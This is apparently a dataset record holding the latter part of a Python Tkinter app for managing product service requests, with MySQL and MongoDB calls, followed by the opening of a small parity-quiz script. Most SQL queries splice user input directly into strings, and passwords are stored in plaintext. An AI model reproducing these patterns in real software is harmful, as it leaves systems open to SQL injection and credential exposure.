query_1)[0]\n category, model = res_1\n\n requiresPayment = requestRequiresPaymentValidation(itemID)\n fee = getRequestFee(itemID) if requiresPayment else 0\n\n return (itemID,category,model,fee)\n \n def clearFormEntry():\n formEntry0.delete(0, END)\n\n def select_record(e):\n # delete current entry boxes\n clearFormEntry()\n selected = myInventoryTable.focus()\n attrs = myInventoryTable.item(selected)[\"values\"]\n\n formEntry0.insert(0, attrs[0])\n\n\n inventoryFrame = Frame(requestPage, highlightbackground = 'black', highlightthickness = 1)\n inventoryLabel = Label(inventoryFrame, text = \"Your Items\", relief = SUNKEN, bg = \"orange\")\n inventoryLabel.place(relwidth = 1, relheight = 0.1)\n detailNames = ['Item ID', 'Category', 'Model', 'Service Fee']\n myInventoryTable = ttk.Treeview(inventoryFrame, column=detailNames, show=\"headings\", height=5)\n for name in detailNames:\n myInventoryTable.heading(name, text=name, anchor=CENTER)\n myInventoryTable.column(name, anchor=CENTER, stretch=NO, width=150)\n test_query = \"SELECT * FROM Purchase WHERE customerID = '%s' \" % (person[0])\n results = readQuery(connection, test_query)\n if len(results) != 0:\n for ele in results:\n tup = getInventoryRow(ele[0]) # ele[0] -> purchase_id\n myInventoryTable.insert(\"\",\"end\",text=str(ele), values=tup)\n myInventoryTable.place(relheight = 0.9, relwidth = 1, rely = 0.1)\n inventoryFrame.place(relx = 0.55, rely = 0.05, relwidth = 0.4, relheight = 0.32)\n \n # NOTE: the event string was lost in extraction; \"<ButtonRelease-1>\" is assumed (click an item to copy its ID into the request form).\n myInventoryTable.bind(\"<ButtonRelease-1>\", select_record)\n\n\n # Init\n requestPage.place(relwidth = 1, relheight = 1)\n selectionFrame.place(relx = 0.05, rely = 0.05, relwidth = 0.45)\n buttonsFrame.place(relx = 0.05, rely = 0.2, relwidth = 0.45)\n requestFormFrame.place(relx = 0.05, rely = 0.3, relwidth = 0.45)\n displayTable()\n\n\ndef requestForm(itemID, person):\n\n # variables\n userID = person[0]\n request_status = [\n \"Submitted\",\n \"Submitted and Waiting for payment\",\n \"In progress\",\n \"Approved\",\n \"Canceled\",\n \"Completed\",\n ]\n\n # Functions\n def itemExistsValidation(itemID):\n query_string = f\"SELECT * FROM Purchase INNER JOIN Item USING(purchaseID) WHERE customerID = {userID} AND itemID = '{itemID}'\"\n res = readQuery(connection, query_string)\n return len(res) != 0\n\n def itemHasNoPendingRequestValidation(itemID):\n query_string = f\"SELECT * FROM Request WHERE requestStatus \\\n IN ('Submitted', 'Submitted and Waiting for payment', 'In progress', 'Approved') AND itemID='{itemID}'\"\n res = readQuery(connection, query_string)\n return len(res) == 0\n\n def getRequestStatus(itemID):\n requires_payment = requestRequiresPaymentValidation(itemID)\n if requires_payment:\n return request_status[1]\n else:\n return request_status[0]\n\n def getAdminWithLeastRequests():\n query_string = (\n f\"SELECT adminID, COUNT(adminID) FROM Administrator LEFT JOIN Request USING(adminID) GROUP BY adminID ORDER BY COUNT(adminID)\"\n )\n res = readQuery(connection, query_string)[0][0]\n return res\n\n def getNumOfRequests():\n query_string = \"SELECT COUNT(*) FROM Request\"\n res = readQuery(connection, query_string)[0][0]\n return res\n\n def commitData():\n print(itemID, userID)\n try:\n if not itemExistsValidation(itemID):\n return messagebox.showerror(\n title=\"Error\", message=\"Item does not exist or does not belong to the user\"\n )\n \n elif not itemHasNoPendingRequestValidation(itemID):\n return messagebox.showerror(\n title=\"Error\", message=\"Item has a pending request\"\n )\n\n else:\n requestDate = date.today().strftime(\"%Y-%m-%d\")\n requestFee = 
(\n 0\n if not requestRequiresPaymentValidation(itemID)\n else getRequestFee(itemID)\n )\n requestStatus = getRequestStatus(itemID)\n adminID = getAdminWithLeastRequests()\n requestID = getNumOfRequests() + 1\n\n query_string = f\"INSERT INTO Request VALUES ({requestID}, {requestFee},'{requestDate}','{requestStatus}',{userID},{adminID},'{itemID}')\"\n executeQuery(connection, query_string)\n\n collectionItem.find_one_and_update({\"ItemID\":{\"$eq\":itemID}}, {\n \"$set\":{\"ServiceStatus\": \"Waiting for approval\"}\n })\n return messagebox.showinfo(\n title=\"success\", message=f\"Request Submitted!\"\n )\n\n except Exception as e:\n print(e)\n return messagebox.showerror(title=\"Error\", message=\"System Error\")\n\n # init\n commitData()\n\ndef requestRequiresPaymentValidation(itemID):\n def getEndDate(warranty, purchase_date):\n end_date = purchase_date + relativedelta(months=int(warranty))\n return end_date\n\n query_string_product_warranty = f\"SELECT warranty FROM Product WHERE productID = (SELECT productID FROM Item WHERE itemID = '{itemID}')\"\n query_string_purchase_date = f\"SELECT purchaseDate FROM Purchase INNER JOIN Item ON Purchase.purchaseID = Item.purchaseID WHERE itemID = '{itemID}'\"\n res1 = readQuery(connection, query_string_product_warranty)[0][0]\n res2 = readQuery(connection, query_string_purchase_date)[0][0]\n end_date = getEndDate(res1, res2)\n return end_date < date.today()\n\ndef getRequestFee(itemID):\n FLAT_FEE = 40\n RATE = 0.2\n\n query_string = f\"SELECT price FROM Product INNER JOIN Item USING(productID) WHERE itemID = '{itemID}'\"\n res = readQuery(connection, query_string)[0][0]\n\n return FLAT_FEE + RATE * res\n\n\n#################################################################################\n# 5. Service Management Page (Admin)\n#################################################################################\ndef serviceManagement(person):\n global requestListFrame\n global SELECTED_ROWS\n\n # Frames\n requestPage = Frame(root)\n requestListFrame = Frame(\n requestPage, highlightbackground=\"black\", highlightthickness=1, bg=\"grey\"\n )\n\n selectionFrame = LabelFrame(requestPage, text=\"Record\")\n buttonsFrame = LabelFrame(\n requestPage,\n text=\"Options\",\n highlightbackground=\"black\",\n highlightthickness=1,\n bg=\"grey\",\n )\n requestFormFrame = LabelFrame(\n requestPage,\n text=\"New Request\",\n highlightbackground=\"black\",\n highlightthickness=1,\n )\n\n # Labels\n serviceLabel = Label(\n requestPage, text=f\"Service Management\", bg=\"violet\", relief=SUNKEN\n )\n serviceLabel.place(relwidth = 1, relheight = 0.05)\n\n # Entries\n attrLabel0 = Label(selectionFrame, text=\"ID\")\n attrLabel0.grid(row=0, column=0, padx=10, pady=10)\n attrEntry0 = Entry(selectionFrame)\n attrEntry0.grid(row=0, column=1, padx=10, pady=10)\n\n attrLabel1 = Label(selectionFrame, text=\"Fee ($)\")\n attrLabel1.grid(row=0, column=2, padx=10, pady=10)\n attrEntry1 = Entry(selectionFrame)\n attrEntry1.grid(row=0, column=3, padx=10, pady=10)\n\n attrLabel2 = Label(selectionFrame, text=\"Date\")\n attrLabel2.grid(row=0, column=4, padx=10, pady=10)\n attrEntry2 = Entry(selectionFrame)\n attrEntry2.grid(row=0, column=5, padx=10, pady=10)\n\n attrLabel3 = Label(selectionFrame, text=\"Status\")\n attrLabel3.grid(row=1, column=0, padx=10, pady=10)\n attrEntry3 = Entry(selectionFrame)\n attrEntry3.grid(row=1, column=1, padx=10, pady=10)\n\n attrLabel4 = Label(selectionFrame, text=\"Item ID\")\n attrLabel4.grid(row=1, column=2, padx=10, pady=10)\n attrEntry4 = 
Entry(selectionFrame)\n attrEntry4.grid(row=1, column=3, padx=10, pady=10)\n\n # Variables\n adminID = person[0]\n SELECTED_ROWS = []\n\n # Helpers\n\n def displayTable():\n requests = getAdminRequests(adminID)\n # requests = [{\"ID\":1,\"Fee ($)\":200.0,\"Date\":\"31/12\",\"Status\":\"no\",\"Item ID\":2}]\n createTable(requests)\n\n def createTable(requests):\n global requestListFrame\n global SELECTED_ROWS\n SELECTED_ROWS = []\n requestListFrame.destroy()\n requestListFrame = Frame(\n requestPage, highlightbackground=\"black\", highlightthickness=1, bg=\"grey\"\n )\n requestListFrame.place(relx = 0.05, rely = 0.4, relwidth = 0.9, relheight = 0.55)\n\n columnNames = (\"ID\", \"Fee ($)\", \"Date\", \"Status\", \"Item ID\")\n tableScroll = Scrollbar(requestListFrame)\n tableScroll.pack(side=RIGHT, fill=Y)\n table = ttk.Treeview(\n requestListFrame,\n yscrollcommand=tableScroll.set,\n column=columnNames,\n show=\"headings\",\n selectmode=\"extended\",\n )\n table.place(relwidth = 1, relheight = 1)\n tableScroll.config(command=table.yview)\n for name in columnNames:\n table.heading(name, text=name, anchor=CENTER)\n if requests:\n for r in requests:\n toInsert = (r[0], r[1], r[2], r[3], int(r[4]))\n table.insert(\"\", \"end\", text=str(r), values=toInsert)\n\n # Function\n def select_record(e):\n global SELECTED_ROWS\n # delete current entry boxes\n clearEntries()\n SELECTED_ROWS = []\n selected = table.focus()\n attrs = table.item(selected)[\"values\"]\n\n attrEntry0.insert(0, attrs[0])\n attrEntry1.insert(0, attrs[1])\n attrEntry2.insert(0, attrs[2])\n attrEntry3.insert(0, attrs[3])\n attrEntry4.insert(0, attrs[4])\n\n def select_records(e):\n global SELECTED_ROWS\n # delete current entry boxes\n clearEntries()\n selected = table.selection()\n\n # display values for first row\n attrs = table.item(selected[0])[\"values\"]\n attrEntry0.insert(0, attrs[0])\n attrEntry1.insert(0, attrs[1])\n attrEntry2.insert(0, attrs[2])\n attrEntry3.insert(0, attrs[3])\n attrEntry4.insert(0, attrs[4])\n\n SELECTED_ROWS = [table.item(ele)[\"values\"] for ele in selected]\n\n # Event. NOTE: the original event strings were lost in extraction; these sequences are assumed (plain click loads one row, Shift/Ctrl-click loads the multi-selection).\n table.bind(\"<ButtonRelease-1>\", select_record)\n table.bind(\"<Shift-ButtonRelease-1>\", select_records)\n table.bind(\"<Control-ButtonRelease-1>\", select_records)\n\n def goHome():\n requestPage.destroy()\n adminHome(person)\n\n def getAdminRequests(userID):\n query_string = f\"SELECT requestID, requestFee, requestDate, requestStatus, itemID FROM Request WHERE adminID = {adminID}\"\n return readQuery(connection, query_string)\n\n def clearEntries():\n # clear entry boxes\n attrEntry0.delete(0, END)\n attrEntry1.delete(0, END)\n attrEntry2.delete(0, END)\n attrEntry3.delete(0, END)\n attrEntry4.delete(0, END)\n\n def getServiceStatus(itemID):\n query_string = f\"SELECT serviceStatus FROM Item WHERE itemID={itemID}\"\n return readQuery(connection, query_string)[0][0]\n\n def approveRequest():\n try:\n if SELECTED_ROWS == []: # only one entry\n requestID = attrEntry0.get()\n requestStatus = attrEntry3.get()\n itemID = attrEntry4.get()\n if requestStatus == \"In progress\" or requestStatus == \"Submitted\":\n response = messagebox.askokcancel(\n \"Approve Request\", message=f\"Approve request #{requestID}?\"\n )\n if response:\n query_string_1 = f\"UPDATE Request SET requestStatus='Approved' WHERE requestID = {requestID}\"\n query_string_2 = f\"UPDATE Item SET serviceStatus='In progress' WHERE itemID = {itemID}\"\n executeQuery(connection, query_string_1)\n executeQuery(connection, query_string_2)\n\n collectionItem.find_one_and_update({\"ItemID\": {\"$eq\":itemID}}, {\n \"$set\":{\"ServiceStatus\": \"In progress\"}\n })\n\n 
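# refresh the entry boxes and redraw the table so the approved status is visible\n 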
clearEntries()\n displayTable()\n\n else:\n return messagebox.showerror(\n title=\"Error\", message=\"Request cannot be approved\"\n )\n else:\n\n setOfRequestStatus = set([ele[3] for ele in SELECTED_ROWS])\n IDs = tuple(ele[0] for ele in SELECTED_ROWS)\n itemIDs = tuple(str(ele[4]) for ele in SELECTED_ROWS)\n \n #print(setOfRequestStatus)\n #print(IDs)\n #print(itemIDs)\n\n if setOfRequestStatus.issubset({\"In progress\", \"Submitted\"}):\n response = messagebox.askokcancel(\n \"Approve Requests\",\n message=f\"Approve ({len(SELECTED_ROWS)}) selected requests?\",\n )\n if response:\n query_string_1 = f\"UPDATE Request SET requestStatus='Approved' WHERE requestID IN {IDs}\"\n query_string_2 = f\"UPDATE Item SET serviceStatus='In progress' WHERE itemID IN {itemIDs}\"\n executeQuery(connection, query_string_1)\n executeQuery(connection, query_string_2)\n\n collectionItem.update_many({\"ItemID\":{\"$in\":list(itemIDs)}},{\n \"$set\":{\"ServiceStatus\": \"In progress\"}\n } )\n\n clearEntries()\n displayTable()\n else:\n return messagebox.showerror(\n title=\"Error\", message=\"Requests cannot be approved\"\n )\n\n except:\n return messagebox.showerror(title=\"Error\", message=\"An error has occurred\")\n\n def serviceRequest():\n try:\n if SELECTED_ROWS == []: # only one entry\n requestID = attrEntry0.get()\n requestStatus = attrEntry3.get()\n itemID = attrEntry4.get()\n if (\n requestStatus == \"Approved\"\n and getServiceStatus(itemID) == \"In progress\"\n ):\n response = messagebox.askokcancel(\n \"Service Request\", message=f\"Service request #{requestID}?\"\n )\n if response:\n query_string_1 = f\"UPDATE Request SET requestStatus='Completed' WHERE requestID = {requestID}\"\n query_string_2 = f\"UPDATE Item SET serviceStatus='Completed' WHERE itemID = {itemID}\"\n executeQuery(connection, query_string_1)\n executeQuery(connection, query_string_2)\n\n collectionItem.update_many({\"ItemID\":{\"$eq\":itemID}},{\n \"$set\":{\"ServiceStatus\": \"Completed\"}\n } )\n\n clearEntries()\n displayTable()\n\n else:\n return messagebox.showerror(\n title=\"Error\", message=\"Request cannot be serviced\"\n )\n else:\n setOfRequestStatus = set([ele[3] for ele in SELECTED_ROWS])\n IDs = tuple(ele[0] for ele in SELECTED_ROWS)\n itemIDs = tuple(str(ele[4]) for ele in SELECTED_ROWS)\n setOfServiceStatus = set([getServiceStatus(id) for id in itemIDs])\n\n if setOfRequestStatus == {\"Approved\"} and setOfServiceStatus == {\n \"In progress\"\n }:\n response = messagebox.askokcancel(\n \"Service Requests\",\n message=f\"Service ({len(SELECTED_ROWS)}) selected requests?\",\n )\n if response:\n query_string_1 = f\"UPDATE Request SET requestStatus='Completed' WHERE requestID IN {IDs}\"\n query_string_2 = f\"UPDATE Item SET serviceStatus='Completed' WHERE itemID IN {itemIDs}\"\n executeQuery(connection, query_string_1)\n executeQuery(connection, query_string_2)\n\n collectionItem.update_many({\"ItemID\":{\"$in\":list(itemIDs)}},{\n \"$set\":{\"ServiceStatus\": \"Completed\"}\n } )\n\n clearEntries()\n displayTable()\n else:\n return messagebox.showerror(\n title=\"Error\", message=\"Requests cannot be serviced\"\n )\n\n except:\n return messagebox.showerror(\n title=\"Error\", message=\"Service cannot be completed\"\n )\n\n def viewItem():\n try:\n itemID = attrEntry4.get()\n return goToItem(person, itemID, True)\n except:\n return messagebox.showerror(title=\"Error\", message=\"Invalid Item ID\")\n\n def detailStats():\n requestPage.destroy()\n goToDetails(person)\n\n # Buttons\n\n displayButton = Button(\n 
buttonsFrame, text=\"Display/Refresh Table\", command=displayTable, bg=\"white\"\n )\n displayButton.grid(row=0, column=0, padx=10, pady=10)\n\n homeButton = Button(buttonsFrame, text=\"Return to Home\", command=goHome, bg=\"blue\")\n homeButton.grid(row=0, column=1, padx=10, pady=10)\n\n viewItemButton = Button(buttonsFrame, text=\"View Item\", command=viewItem, bg=\"blue\")\n viewItemButton.grid(row=0, column=2, padx=10, pady=10)\n\n approveRequestButton = Button(\n buttonsFrame, text=\"Approve Request(s)\", command=approveRequest, bg=\"green\"\n )\n approveRequestButton.grid(row=0, column=3, padx=10, pady=10)\n\n serviceRequestButton = Button(\n buttonsFrame, text=\"Service Request(s)\", command=serviceRequest, bg=\"green\"\n )\n serviceRequestButton.grid(row=0, column=4, padx=10, pady=10)\n\n allDetailsButton = Button(buttonsFrame, text=\"Administrator Functions\",\n command=detailStats, bg=\"pink\")\n allDetailsButton.grid(row=0, column=5, padx=10, pady=10)\n\n # Init\n requestPage.place(relwidth = 1, relheight = 1)\n selectionFrame.place(relx = 0.05, rely = 0.05, relwidth = 0.60)\n buttonsFrame.place(relx = 0.05, rely = 0.2, relwidth = 0.60)\n requestFormFrame.place(relx = 0.05, rely = 0.3, relwidth = 0.45)\n displayTable()\n\n#################################################################################\n# 5.1 Details and Delinquents Page\n#################################################################################\ndef goToDetails(person):\n detailsPage = Frame(root)\n\n # Labels\n titleLabel = Label(detailsPage, text = \"Request Summary and Delinquents\", relief = SUNKEN, bg = 'violet')\n titleLabel.place(relwidth = 1, relheight = 0.05)\n\n delinquentLabel = Label(detailsPage, text = \"Delinquent Customers\", relief = SUNKEN, bg = \"orange\")\n delinquentLabel.place(relwidth = 0.5, relheight = 0.05, rely = 0.05)\n\n detailsLabel = Label(detailsPage, text = \"All Incomplete Service Requests\", relief = SUNKEN, bg = \"Yellow\")\n detailsLabel.place(relwidth=0.5, relheight=0.05, rely=0.05, relx = 0.5)\n\n # Delinquent Table\n delinquentFrame = Frame(detailsPage, highlightbackground = 'black', highlightthickness = 1)\n detailNames = ['customerID', 'Name', 'requestID', 'requestFee']\n dqTable = ttk.Treeview(delinquentFrame, column=detailNames, show=\"headings\", height=5)\n for name in detailNames:\n dqTable.heading(name, text=name, anchor=CENTER)\n dqTable.column(name, anchor=CENTER, stretch=NO, width=170)\n test_query = \"SELECT * FROM Request WHERE requestStatus = 'Submitted and Waiting for payment'\"\n results = readQuery(connection, test_query)\n if len(results) != 0:\n for item in results:\n test_query2 = \"SELECT * FROM Customer WHERE customerID = '%s' \" % (item[4])\n mydetails = readQuery(connection, test_query2)[0]\n customerName = mydetails[1]\n dqTable.insert(\"\",\"end\",text=str(item), values=(int(item[4]),customerName, item[0],item[1]))\n dqTable.place(relheight = 1, relwidth = 1)\n delinquentFrame.place(rely = 0.1, relwidth = 0.5, relheight = 0.8)\n\n # Service Request Table\n serviceFrame = Frame(detailsPage, highlightbackground = 'black', highlightthickness = 1)\n serviceName = ['requestID', 'requestStatus']\n servTable = ttk.Treeview(serviceFrame, column=serviceName, show=\"headings\", height=5)\n for name in serviceName:\n servTable.heading(name, text=name, anchor=CENTER)\n servTable.column(name, anchor=CENTER, stretch=NO, width=350)\n test_query = \"SELECT * FROM Request WHERE requestStatus NOT IN ('Canceled', 'Completed')\"\n results = 
readQuery(connection, test_query)\n if len(results) != 0:\n for item in results:\n servTable.insert(\"\",\"end\",text=str(item), values=(item[0], item[3]))\n servTable.place(relheight = 1, relwidth = 1)\n serviceFrame.place(rely = 0.1, relx = 0.5, relwidth = 0.5, relheight = 0.8)\n\n # Functions\n def back():\n detailsPage.destroy()\n serviceManagement(person)\n\n # Buttons\n backButton = Button(detailsPage, text = \"Back to Service Management\", bg = \"blue\", command = back, fg = \"white\")\n backButton.place(relx = 0.05, rely = 0.95)\n\n # Initialise\n detailsPage.place(relwidth = 1, relheight = 1)\n\n#################################################################################\n# 6. Sign up Page\n#################################################################################\ndef goToSignUp():\n signUpPage = Frame(root, bg=\"grey\")\n\n # Labels\n signUpLabel = Label(signUpPage, text=\"New User Page\", bg=\"lightblue\", relief=SUNKEN)\n signUpLabel2 = Label(signUpPage, text=\"Please select the user type:\")\n\n signUpLabel.place(relwidth=1, relheight=0.05)\n signUpLabel2.place(relwidth=1, relheight=0.05, rely=0.05)\n\n # Functions\n def transitionPages(state):\n signUpPage.destroy()\n if state == \"admin\":\n adminForm()\n elif state == \"user\":\n userForm()\n else:\n goToLogin()\n\n # Buttons\n userButton = Button(\n signUpPage,\n text=\"User Sign-up\",\n width=50,\n command=lambda: transitionPages(\"user\"),\n bg=\"green\",\n )\n adminButton = Button(\n signUpPage,\n text=\"Admin Sign-up\",\n width=50,\n command=lambda: transitionPages(\"admin\"),\n bg=\"green\",\n )\n goBackButton = Button(\n signUpPage,\n text=\"Return to Sign-in\",\n width=50,\n command=lambda: transitionPages(\"\"),\n bg=\"blue\",\n )\n\n userButton.place(relx=0.38, rely=0.2)\n adminButton.place(relx=0.38, rely=0.3)\n goBackButton.place(relx=0.38, rely=0.6)\n\n # Initialise\n signUpPage.place(relwidth=1, relheight=1)\n\n\ndef userForm():\n formPage = Frame(root, bg=\"grey\")\n\n # Labels\n title = Label(formPage, text=\"User Sign Up\", relief=SUNKEN, bg=\"lightblue\")\n\n formLabel0 = Label(formPage, text=\"Set User ID: \")\n formLabel1 = Label(formPage, text=\"Name: \")\n formLabel2 = Label(formPage, text=\"Email: \")\n formLabel3 = Label(formPage, text=\"Phone: \")\n formLabel4 = Label(formPage, text=\"Address: \")\n formLabel5 = Label(formPage, text=\"Password: \")\n formLabel6 = Label(formPage, text=\"Gender: \")\n\n title.place(relwidth=1, relheight=0.05)\n formLabel0.place(relx=0.2, rely=0.3)\n formLabel1.place(relx=0.2, rely=0.35)\n formLabel2.place(relx=0.2, rely=0.4)\n formLabel3.place(relx=0.2, rely=0.45)\n formLabel4.place(relx=0.2, rely=0.5)\n formLabel5.place(relx=0.2, rely=0.55)\n formLabel6.place(relx=0.2, rely=0.6)\n\n # Functions\n def renewFields():\n formPage.destroy()\n userForm()\n\n def commitData():\n try:\n customerId = customerIdField.get()\n name = nameField.get()\n emailAddress = emailAddressField.get()\n phoneNumber = phoneNumberField.get()\n address = addressField.get()\n password = passwordField.get()\n gender = genderField.get()\n except:\n return messagebox.showerror(title=\"Error\", message=\"Invalid type/Input\")\n\n if customerId == \"\":\n return messagebox.showerror(\n title=\"Error\", message=\"Customer ID cannot be empty\"\n )\n if name == \"\":\n return messagebox.showerror(title=\"Error\", message=\"Name cannot be empty\")\n if emailAddress == \"\":\n return messagebox.showerror(\n title=\"Error\", message=\"Email address cannot be empty\"\n )\n if phoneNumber == 
\"\":\n return messagebox.showerror(\n title=\"Error\", message=\"phoneNumber cannot be empty\"\n )\n if address == \"\":\n return messagebox.showerror(\n title=\"Error\", message=\"Address cannot be empty\"\n )\n if password == \"\":\n return messagebox.showerror(\n title=\"Error\", message=\"Password cannot be empty\"\n )\n\n test_query = \"SELECT * FROM Customer WHERE customerID = '%s' \" % (customerId)\n results = readQuery(connection, test_query)\n\n if len(results) == 0:\n sql_query = (\n \"INSERT INTO Customer VALUES ('%s', '%s','%s','%s', '%s','%s','%s')\"\n % (\n customerId,\n name,\n gender,\n emailAddress,\n phoneNumber,\n address,\n password,\n )\n )\n test = executeQuery(connection, sql_query)\n if test:\n return messagebox.showinfo(\n title=\"success\", message=\"Registration successful!\"\n )\n else:\n return messagebox.showerror(\n title=\"Error\",\n message=\"Commit Error, some data may be invalid\",\n )\n else:\n return messagebox.showerror(\n title=\"Error\",\n message=\"There is an existing customer ID, please use another ID\",\n )\n\n def cancelForm():\n formPage.destroy()\n goToSignUp()\n\n # Fields\n customerId = IntVar()\n customerIdField = Entry(formPage, textvariable=customerId, width=50)\n test_query = \"SELECT MAX(customerID) FROM Customer\"\n value = int(readQuery(connection, test_query)[0][0]) + 1\n customerIdField.delete(0, END)\n customerIdField.insert(0, value)\n customerIdField.place(relx=0.3, rely=0.3)\n\n name = StringVar()\n nameField = Entry(formPage, textvariable=name, width=50)\n nameField.place(relx=0.3, rely=0.35)\n\n emailAddress = StringVar()\n emailAddressField = Entry(formPage, textvariable=emailAddress, width=50)\n emailAddressField.place(relx=0.3, rely=0.4)\n\n phoneNumber = StringVar()\n phoneNumberField = Entry(formPage, textvariable=phoneNumber, width=50)\n phoneNumberField.place(relx=0.3, rely=0.45)\n\n address = StringVar()\n addressField = Entry(formPage, textvariable=address, width=50)\n addressField.place(relx=0.3, rely=0.5)\n\n password = StringVar()\n passwordField = Entry(formPage, textvariable=password, width=50)\n passwordField.place(relx=0.3, rely=0.55)\n\n # Buttons\n commitButton = Button(\n formPage, text=\"Confirm Details\", width=50, command=commitData, bg=\"green\"\n )\n resetButton = Button(\n formPage, text=\"Clear all fields\", width=50, command=renewFields, bg=\"white\"\n )\n cancelButton = Button(\n formPage,\n text=\"Return to User type Selection\",\n width=50,\n command=cancelForm,\n bg=\"red\",\n )\n\n commitButton.place(relx=0.3, rely=0.7)\n resetButton.place(relx=0.3, rely=0.75)\n cancelButton.place(relx=0.3, rely=0.8)\n\n genderField = StringVar()\n MaleButton = Radiobutton(\n formPage,\n text=\"Male\",\n padx=20,\n variable=genderField,\n value=\"Male\",\n font=(\"Mincho\", 20),\n )\n FemaleButton = Radiobutton(\n formPage,\n text=\"Female\",\n padx=20,\n variable=genderField,\n value=\"Female\",\n font=(\"Mincho\", 20),\n )\n\n MaleButton.place(relx=0.3, rely=0.6)\n FemaleButton.place(relx=0.4, rely=0.6)\n\n # Initialise\n formPage.place(relwidth=1, relheight=1)\n\n\ndef adminForm():\n formPage = Frame(root, bg=\"grey\")\n\n # Labels\n title = Label(formPage, text=\"User Sign Up\", relief=SUNKEN, bg=\"lightblue\")\n\n formLabel0 = Label(formPage, text=\"Set Admin ID: \")\n formLabel1 = Label(formPage, text=\"Name: \")\n formLabel2 = Label(formPage, text=\"Phone: \")\n formLabel3 = Label(formPage, text=\"Set Password: \")\n formLabel4 = Label(formPage, text=\"Gender: \")\n\n title.place(relwidth=1, 
relheight=0.05)\n formLabel0.place(relx=0.2, rely=0.3)\n formLabel1.place(relx=0.2, rely=0.35)\n formLabel2.place(relx=0.2, rely=0.4)\n formLabel3.place(relx=0.2, rely=0.45)\n formLabel4.place(relx=0.2, rely=0.5)\n\n # Functions\n def renewFields():\n formPage.destroy()\n adminForm()\n\n def commitData():\n try:\n administratorId = administratorIdField.get()\n name = nameField.get()\n phoneNumber = phoneNumberField.get()\n password = passwordField.get()\n gender = genderField.get()\n except:\n return messagebox.showerror(title=\"Error\", message=\"Invalid type/Input\")\n\n if administratorId == \"\":\n return messagebox.showerror(\n title=\"Error\", message=\"administrator ID cannot be empty\"\n )\n if name == \"\":\n return messagebox.showerror(title=\"Error\", message=\"Name cannot be empty\")\n if phoneNumber == \"\":\n return messagebox.showerror(\n title=\"Error\", message=\"phoneNumber cannot be empty\"\n )\n if password == \"\":\n return messagebox.showerror(\n title=\"Error\", message=\"Password cannot be empty\"\n )\n\n test_query = \"SELECT * FROM Administrator WHERE adminID = '%s' \" % (\n administratorId\n )\n results = readQuery(connection, test_query)\n\n if len(results) == 0:\n sql_query = (\n \"INSERT INTO Administrator VALUES ('%s','%s','%s','%s', '%s')\"\n % (administratorId, name, gender, phoneNumber, password)\n )\n test = executeQuery(connection, sql_query)\n if test:\n return messagebox.showinfo(\n title=\"success\", message=\"Registration successful!\"\n )\n else:\n return messagebox.showerror(\n title=\"Error\",\n message=\"Commit Error, some data may be invalid\",\n )\n else:\n return messagebox.showerror(\n title=\"Error\",\n message=\"There is an existing administrator ID, please use another ID\",\n )\n\n def cancelForm():\n formPage.destroy()\n goToSignUp()\n\n # Fields\n administratorId = IntVar()\n administratorIdField = Entry(formPage, textvariable=administratorId, width=50)\n test_query = \"SELECT MAX(adminID) FROM Administrator\"\n value = int(readQuery(connection, test_query)[0][0]) + 1\n administratorIdField.delete(0, END)\n administratorIdField.insert(0, value)\n administratorIdField.place(relx=0.3, rely=0.3)\n\n name = StringVar()\n nameField = Entry(formPage, textvariable=name, width=50)\n nameField.place(relx=0.3, rely=0.35)\n\n phoneNumber = StringVar()\n phoneNumberField = Entry(formPage, textvariable=phoneNumber, width=50)\n phoneNumberField.place(relx=0.3, rely=0.4)\n\n password = StringVar()\n passwordField = Entry(formPage, textvariable=password, width=50)\n passwordField.place(relx=0.3, rely=0.45)\n # Buttons\n commitButton = Button(\n formPage, text=\"Confirm Details\", width=50, command=commitData, bg=\"green\"\n )\n resetButton = Button(\n formPage, text=\"Clear all fields\", width=50, command=renewFields, bg=\"white\"\n )\n cancelButton = Button(\n formPage,\n text=\"Return to User type Selection\",\n width=50,\n command=cancelForm,\n bg=\"red\",\n )\n\n commitButton.place(relx=0.3, rely=0.7)\n resetButton.place(relx=0.3, rely=0.75)\n cancelButton.place(relx=0.3, rely=0.8)\n\n genderField = StringVar()\n MaleButton = Radiobutton(\n formPage,\n text=\"Male\",\n padx=20,\n variable=genderField,\n value=\"Male\",\n font=(\"Mincho\", 20),\n )\n FemaleButton = Radiobutton(\n formPage,\n text=\"Female\",\n padx=20,\n variable=genderField,\n value=\"Female\",\n font=(\"Mincho\", 20),\n )\n\n MaleButton.place(relx=0.3, rely=0.5)\n FemaleButton.place(relx=0.4, rely=0.5)\n\n # Initialise\n formPage.place(relwidth=1, relheight=1)\n\ndef 
updateRequestTable():\n #cancel requests with payment fee after more than 10 days\n today = date.today().strftime(\"%Y-%m-%d\")\n query_string_1 = f\"UPDATE Request SET requestStatus='Canceled' WHERE requestFee > 0 AND requestStatus='Submitted and Waiting for payment' AND DATE_ADD(requestDate, INTERVAL 10 DAY) < '{today}'\"\n executeQuery(connection,query_string_1)\n\n query_string_2 = f\"SELECT itemID FROM Request WHERE requestStatus='Canceled'\"\n itemIDs = readQuery(connection, query_string_2)\n\n for i in itemIDs:\n query_string_3 = f\"UPDATE Item SET serviceStatus='' WHERE itemID='{i[0]}'\"\n executeQuery(connection,query_string_3)\n collectionItem.find_one_and_update({\"ItemID\":{\"$eq\":i[0]}},{\"$set\": {\"ServiceStatus\": \"\"}})\n\n print(\"Request table updated\")\n\n\n\n#################################################################################\n# Execute Program\nupdateRequestTable()\ngoToLogin()\nroot.mainloop()\n","repo_name":"aaronthamsc98/OSHES","sub_path":"main/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":104258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"5330854435","text":"import prompt\nimport random\n\n\ndef run():\n name = prompt.string('May I have your name? ')\n print(\"Hello, \" + name + \"!\")\n count = 0\n while count < 3:\n rand = random.randint(1, 99)\n print(\"Question: \" + str(rand))\n answer = prompt.string('Your answer: ')\n flag = rand % 2\n if flag:\n if answer == 'no':\n print('Correct!')\n count += 1\n elif answer == 'yes':\n print(\"'yes' is wrong answer ;(. Correct answer was 'no'.\\nLet's try again, \" + name + \"!\")\n else:\n print(\"Incorrect answer. Please answer 'yes' or 'no'\")\n else:\n if answer == 'yes':\n print('Correct!')\n count += 1\n elif answer == 'no':\n print(\"'no' is wrong answer ;(. Correct answer was 'yes'.\\nLet's try again, \" + name + \"!\")\n else:\n print(\"Incorrect answer. 
